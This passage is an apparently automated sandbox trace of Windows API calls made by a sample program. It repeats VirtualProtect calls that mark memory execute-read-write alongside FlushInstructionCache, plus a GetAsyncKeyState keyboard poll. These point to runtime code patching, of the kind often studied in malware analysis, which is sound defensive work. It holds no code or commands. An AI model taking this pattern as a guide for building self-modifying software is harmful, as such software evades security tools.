lpAddress=0xc9120d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.386] GetCurrentProcess () returned 0xffffffff [0114.386] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d5, dwSize=0x2) returned 1 [0114.386] GetCurrentProcess () returned 0xffffffff [0114.386] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f4, dwSize=0x14) returned 1 [0114.386] VirtualProtect (in: lpAddress=0xc9120f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.387] GetCurrentProcess () returned 0xffffffff [0114.387] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f5, dwSize=0x2) returned 1 [0114.387] GetCurrentProcess () returned 0xffffffff [0114.387] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912114, dwSize=0x14) returned 1 [0114.387] VirtualProtect (in: lpAddress=0xc912114, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.388] GetCurrentProcess () returned 0xffffffff [0114.388] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912115, dwSize=0x2) returned 1 [0114.388] GetCurrentProcess () returned 0xffffffff [0114.388] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912134, dwSize=0x14) returned 1 [0114.388] VirtualProtect (in: lpAddress=0xc912134, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.388] GetCurrentProcess () returned 0xffffffff [0114.388] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912135, dwSize=0x2) returned 1 [0114.388] GetCurrentProcess () returned 0xffffffff [0114.388] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912154, dwSize=0x14) returned 1 [0114.389] VirtualProtect (in: lpAddress=0xc912154, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.389] GetCurrentProcess () returned 0xffffffff [0114.389] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912155, dwSize=0x2) returned 1 [0114.389] GetCurrentProcess () returned 0xffffffff [0114.389] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912174, dwSize=0x14) returned 1 [0114.389] VirtualProtect (in: lpAddress=0xc912174, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.390] GetCurrentProcess () returned 0xffffffff [0114.390] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912175, dwSize=0x2) returned 1 [0114.390] GetCurrentProcess () returned 0xffffffff [0114.390] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912194, dwSize=0x14) returned 1 [0114.390] VirtualProtect (in: lpAddress=0xc912194, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.390] GetCurrentProcess () returned 0xffffffff [0114.390] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912195, dwSize=0x2) returned 1 [0114.390] GetCurrentProcess () returned 0xffffffff [0114.390] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b4, dwSize=0x14) returned 1 [0114.391] VirtualProtect (in: lpAddress=0xc9121b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.391] GetCurrentProcess () returned 0xffffffff [0114.391] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b5, dwSize=0x2) returned 1 [0114.391] GetCurrentProcess () returned 0xffffffff [0114.391] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d4, dwSize=0x14) returned 1 [0114.391] VirtualProtect (in: lpAddress=0xc9121d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.392] GetCurrentProcess () returned 0xffffffff [0114.392] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d5, dwSize=0x2) returned 1 [0114.392] GetCurrentProcess () returned 0xffffffff [0114.392] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc898, dwSize=0x14) returned 1 [0114.392] VirtualProtect (in: lpAddress=0xcadc898, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.393] GetCurrentProcess () returned 0xffffffff [0114.393] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc899, dwSize=0x2) returned 1 [0114.393] GetCurrentProcess () returned 0xffffffff [0114.393] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b8, dwSize=0x14) returned 1 [0114.393] VirtualProtect (in: lpAddress=0xcadc8b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.394] GetCurrentProcess () returned 0xffffffff [0114.394] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b9, dwSize=0x2) returned 1 [0114.394] GetCurrentProcess () returned 0xffffffff [0114.394] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d8, dwSize=0x14) returned 1 [0114.394] VirtualProtect (in: lpAddress=0xcadc8d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.395] GetCurrentProcess () returned 0xffffffff [0114.395] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d9, dwSize=0x2) returned 1 [0114.395] GetCurrentProcess () returned 0xffffffff [0114.395] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f8, dwSize=0x14) returned 1 [0114.395] VirtualProtect (in: lpAddress=0xcadc8f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.396] GetCurrentProcess () returned 0xffffffff [0114.396] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f9, dwSize=0x2) returned 1 [0114.396] GetCurrentProcess () returned 0xffffffff [0114.396] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc918, dwSize=0x14) returned 1 [0114.396] VirtualProtect (in: lpAddress=0xcadc918, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.396] GetCurrentProcess () returned 0xffffffff [0114.396] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc919, dwSize=0x2) returned 1 [0114.396] GetCurrentProcess () returned 0xffffffff [0114.396] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc938, dwSize=0x14) returned 1 [0114.396] VirtualProtect (in: lpAddress=0xcadc938, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.397] GetCurrentProcess () returned 0xffffffff [0114.397] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc939, dwSize=0x2) returned 1 [0114.397] GetCurrentProcess () returned 0xffffffff [0114.397] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc958, dwSize=0x14) returned 1 [0114.397] VirtualProtect (in: lpAddress=0xcadc958, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.398] GetCurrentProcess () returned 0xffffffff [0114.398] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc959, dwSize=0x2) returned 1 [0114.398] GetCurrentProcess () returned 0xffffffff [0114.398] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc978, dwSize=0x14) returned 1 [0114.398] VirtualProtect (in: lpAddress=0xcadc978, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.398] GetCurrentProcess () returned 0xffffffff [0114.398] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc979, dwSize=0x2) returned 1 [0114.399] GetCurrentProcess () returned 0xffffffff [0114.399] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc998, dwSize=0x14) returned 1 [0114.399] VirtualProtect (in: lpAddress=0xcadc998, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.399] GetCurrentProcess () returned 0xffffffff [0114.399] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc999, dwSize=0x2) returned 1 [0114.399] GetCurrentProcess () returned 0xffffffff [0114.399] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b8, dwSize=0x14) returned 1 [0114.399] VirtualProtect (in: lpAddress=0xcadc9b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.400] GetCurrentProcess () returned 0xffffffff [0114.400] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b9, dwSize=0x2) returned 1 [0114.400] GetCurrentProcess () returned 0xffffffff [0114.400] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d8, dwSize=0x14) returned 1 [0114.400] VirtualProtect (in: lpAddress=0xcadc9d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.401] GetCurrentProcess () returned 0xffffffff [0114.401] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d9, dwSize=0x2) returned 1 [0114.401] GetCurrentProcess () returned 0xffffffff [0114.401] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f8, dwSize=0x14) returned 1 [0114.401] VirtualProtect (in: lpAddress=0xcadc9f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.402] GetCurrentProcess () returned 0xffffffff [0114.402] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f9, dwSize=0x2) returned 1 [0114.402] GetCurrentProcess () returned 0xffffffff [0114.402] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca18, dwSize=0x14) returned 1 [0114.402] VirtualProtect (in: lpAddress=0xcadca18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.403] GetCurrentProcess () returned 0xffffffff [0114.403] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca19, dwSize=0x2) returned 1 [0114.403] GetCurrentProcess () returned 0xffffffff [0114.403] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca38, dwSize=0x14) returned 1 [0114.403] VirtualProtect (in: lpAddress=0xcadca38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.403] GetCurrentProcess () returned 0xffffffff [0114.403] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca39, dwSize=0x2) returned 1 [0114.403] GetCurrentProcess () returned 0xffffffff [0114.403] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca58, dwSize=0x14) returned 1 [0114.404] VirtualProtect (in: lpAddress=0xcadca58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.404] GetCurrentProcess () returned 0xffffffff [0114.404] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca59, dwSize=0x2) returned 1 [0114.404] GetCurrentProcess () returned 0xffffffff [0114.404] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca78, dwSize=0x14) returned 1 [0114.404] VirtualProtect (in: lpAddress=0xcadca78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.405] GetCurrentProcess () returned 0xffffffff [0114.405] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca79, dwSize=0x2) returned 1 [0114.405] GetCurrentProcess () returned 0xffffffff [0114.405] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e0, dwSize=0x14) returned 1 [0114.405] VirtualProtect (in: lpAddress=0xcadb0e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.406] GetCurrentProcess () returned 0xffffffff [0114.406] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e1, dwSize=0x2) returned 1 [0114.406] GetCurrentProcess () returned 0xffffffff [0114.406] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb100, dwSize=0x14) returned 1 [0114.406] VirtualProtect (in: lpAddress=0xcadb100, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.406] GetCurrentProcess () returned 0xffffffff [0114.406] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb101, dwSize=0x2) returned 1 [0114.406] GetCurrentProcess () returned 0xffffffff [0114.406] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb120, dwSize=0x14) returned 1 [0114.406] VirtualProtect (in: lpAddress=0xcadb120, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.407] GetCurrentProcess () returned 0xffffffff [0114.407] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb121, dwSize=0x2) returned 1 [0114.409] GetAsyncKeyState (vKey=3) returned 0 [0114.409] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.409] CRetailMalloc_Alloc () returned 0xcb0fa98 [0114.409] memcpy (in: _Dst=0xb754f48, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.409] memcpy (in: _Dst=0xcb0fab8, _Src=0x197724, _Size=0x18 | out: _Dst=0xcb0fab8) returned 0xcb0fab8 [0114.409] CRetailMalloc_Realloc () returned 0xcb0fa98 [0114.409] CRetailMalloc_Free () returned 0x1 [0114.410] GetCurrentProcess () returned 0xffffffff [0114.410] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912074, dwSize=0x14) returned 1 [0114.410] VirtualProtect (in: lpAddress=0xc912074, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.410] GetCurrentProcess () returned 0xffffffff [0114.410] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912075, dwSize=0x2) returned 1 [0114.410] GetCurrentProcess () returned 0xffffffff [0114.410] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912094, dwSize=0x14) returned 1 [0114.410] VirtualProtect (in: lpAddress=0xc912094, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.411] GetCurrentProcess () returned 0xffffffff [0114.411] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912095, dwSize=0x2) returned 1 [0114.411] GetCurrentProcess () returned 0xffffffff [0114.411] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b4, dwSize=0x14) returned 1 [0114.411] VirtualProtect (in: lpAddress=0xc9120b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.412] GetCurrentProcess () returned 0xffffffff [0114.412] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b5, dwSize=0x2) returned 1 [0114.412] GetCurrentProcess () returned 0xffffffff [0114.412] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d4, dwSize=0x14) returned 1 [0114.412] VirtualProtect (in: lpAddress=0xc9120d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.412] GetCurrentProcess () returned 0xffffffff [0114.412] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d5, dwSize=0x2) returned 1 [0114.413] GetCurrentProcess () returned 0xffffffff [0114.413] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f4, dwSize=0x14) returned 1 [0114.413] VirtualProtect (in: lpAddress=0xc9120f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.413] GetCurrentProcess () returned 0xffffffff [0114.413] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f5, dwSize=0x2) returned 1 [0114.413] GetCurrentProcess () returned 0xffffffff [0114.413] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912114, dwSize=0x14) returned 1 [0114.413] VirtualProtect (in: lpAddress=0xc912114, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.414] GetCurrentProcess () returned 0xffffffff [0114.414] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912115, dwSize=0x2) returned 1 [0114.414] GetCurrentProcess () returned 0xffffffff [0114.414] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912134, dwSize=0x14) returned 1 [0114.414] VirtualProtect (in: lpAddress=0xc912134, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.415] GetCurrentProcess () returned 0xffffffff [0114.415] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912135, dwSize=0x2) returned 1 [0114.415] GetCurrentProcess () returned 0xffffffff [0114.415] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912154, dwSize=0x14) returned 1 [0114.415] VirtualProtect (in: lpAddress=0xc912154, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.415] GetCurrentProcess () returned 0xffffffff [0114.415] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912155, dwSize=0x2) returned 1 [0114.415] GetCurrentProcess () returned 0xffffffff [0114.416] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912174, dwSize=0x14) returned 1 [0114.416] VirtualProtect (in: lpAddress=0xc912174, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.416] GetCurrentProcess () returned 0xffffffff [0114.416] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912175, dwSize=0x2) returned 1 [0114.416] GetCurrentProcess () returned 0xffffffff [0114.416] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912194, dwSize=0x14) returned 1 [0114.416] VirtualProtect (in: lpAddress=0xc912194, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.417] GetCurrentProcess () returned 0xffffffff [0114.417] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912195, dwSize=0x2) returned 1 [0114.417] GetCurrentProcess () returned 0xffffffff [0114.417] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b4, dwSize=0x14) returned 1 [0114.417] VirtualProtect (in: lpAddress=0xc9121b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.417] GetCurrentProcess () returned 0xffffffff [0114.418] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b5, dwSize=0x2) returned 1 [0114.418] GetCurrentProcess () returned 0xffffffff [0114.418] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d4, dwSize=0x14) returned 1 [0114.418] VirtualProtect (in: lpAddress=0xc9121d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.418] GetCurrentProcess () returned 0xffffffff [0114.418] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d5, dwSize=0x2) returned 1 [0114.418] GetCurrentProcess () returned 0xffffffff [0114.418] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc898, dwSize=0x14) returned 1 [0114.418] VirtualProtect (in: lpAddress=0xcadc898, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.419] GetCurrentProcess () returned 0xffffffff [0114.419] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc899, dwSize=0x2) returned 1 [0114.419] GetCurrentProcess () returned 0xffffffff [0114.419] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b8, dwSize=0x14) returned 1 [0114.419] VirtualProtect (in: lpAddress=0xcadc8b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.420] GetCurrentProcess () returned 0xffffffff [0114.420] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b9, dwSize=0x2) returned 1 [0114.420] GetCurrentProcess () returned 0xffffffff [0114.420] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d8, dwSize=0x14) returned 1 [0114.420] VirtualProtect (in: lpAddress=0xcadc8d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.420] GetCurrentProcess () returned 0xffffffff [0114.420] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d9, dwSize=0x2) returned 1 [0114.420] GetCurrentProcess () returned 0xffffffff [0114.420] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f8, dwSize=0x14) returned 1 [0114.420] VirtualProtect (in: lpAddress=0xcadc8f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.421] GetCurrentProcess () returned 0xffffffff [0114.421] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f9, dwSize=0x2) returned 1 [0114.421] GetCurrentProcess () returned 0xffffffff [0114.421] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc918, dwSize=0x14) returned 1 [0114.421] VirtualProtect (in: lpAddress=0xcadc918, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.422] GetCurrentProcess () returned 0xffffffff [0114.422] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc919, dwSize=0x2) returned 1 [0114.422] GetCurrentProcess () returned 0xffffffff [0114.422] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc938, dwSize=0x14) returned 1 [0114.422] VirtualProtect (in: lpAddress=0xcadc938, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.422] GetCurrentProcess () returned 0xffffffff [0114.422] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc939, dwSize=0x2) returned 1 [0114.422] GetCurrentProcess () returned 0xffffffff [0114.422] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc958, dwSize=0x14) returned 1 [0114.422] VirtualProtect (in: lpAddress=0xcadc958, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.423] GetCurrentProcess () returned 0xffffffff [0114.423] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc959, dwSize=0x2) returned 1 [0114.423] GetCurrentProcess () returned 0xffffffff [0114.423] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc978, dwSize=0x14) returned 1 [0114.423] VirtualProtect (in: lpAddress=0xcadc978, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.424] GetCurrentProcess () returned 0xffffffff [0114.424] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc979, dwSize=0x2) returned 1 [0114.424] GetCurrentProcess () returned 0xffffffff [0114.424] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc998, dwSize=0x14) returned 1 [0114.424] VirtualProtect (in: lpAddress=0xcadc998, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.424] GetCurrentProcess () returned 0xffffffff [0114.424] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc999, dwSize=0x2) returned 1 [0114.424] GetCurrentProcess () returned 0xffffffff [0114.424] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b8, dwSize=0x14) returned 1 [0114.424] VirtualProtect (in: lpAddress=0xcadc9b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.428] GetCurrentProcess () returned 0xffffffff [0114.428] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b9, dwSize=0x2) returned 1 [0114.428] GetCurrentProcess () returned 0xffffffff [0114.428] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d8, dwSize=0x14) returned 1 [0114.428] VirtualProtect (in: lpAddress=0xcadc9d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.429] GetCurrentProcess () returned 0xffffffff [0114.429] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d9, dwSize=0x2) returned 1 [0114.429] GetCurrentProcess () returned 0xffffffff [0114.429] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f8, dwSize=0x14) returned 1 [0114.429] VirtualProtect (in: lpAddress=0xcadc9f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.430] GetCurrentProcess () returned 0xffffffff [0114.430] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f9, dwSize=0x2) returned 1 [0114.430] GetCurrentProcess () returned 0xffffffff [0114.430] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca18, dwSize=0x14) returned 1 [0114.430] VirtualProtect (in: lpAddress=0xcadca18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.430] GetCurrentProcess () returned 0xffffffff [0114.431] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca19, dwSize=0x2) returned 1 [0114.431] GetCurrentProcess () returned 0xffffffff [0114.431] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca38, dwSize=0x14) returned 1 [0114.431] VirtualProtect (in: lpAddress=0xcadca38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.431] GetCurrentProcess () returned 0xffffffff [0114.431] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca39, dwSize=0x2) returned 1 [0114.431] GetCurrentProcess () returned 0xffffffff [0114.431] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca58, dwSize=0x14) returned 1 [0114.431] VirtualProtect (in: lpAddress=0xcadca58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.432] GetCurrentProcess () returned 0xffffffff [0114.432] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca59, dwSize=0x2) returned 1 [0114.432] GetCurrentProcess () returned 0xffffffff [0114.432] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca78, dwSize=0x14) returned 1 [0114.432] VirtualProtect (in: lpAddress=0xcadca78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.433] GetCurrentProcess () returned 0xffffffff [0114.433] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca79, dwSize=0x2) returned 1 [0114.433] GetCurrentProcess () returned 0xffffffff [0114.433] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e0, dwSize=0x14) returned 1 [0114.433] VirtualProtect (in: lpAddress=0xcadb0e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.434] GetCurrentProcess () returned 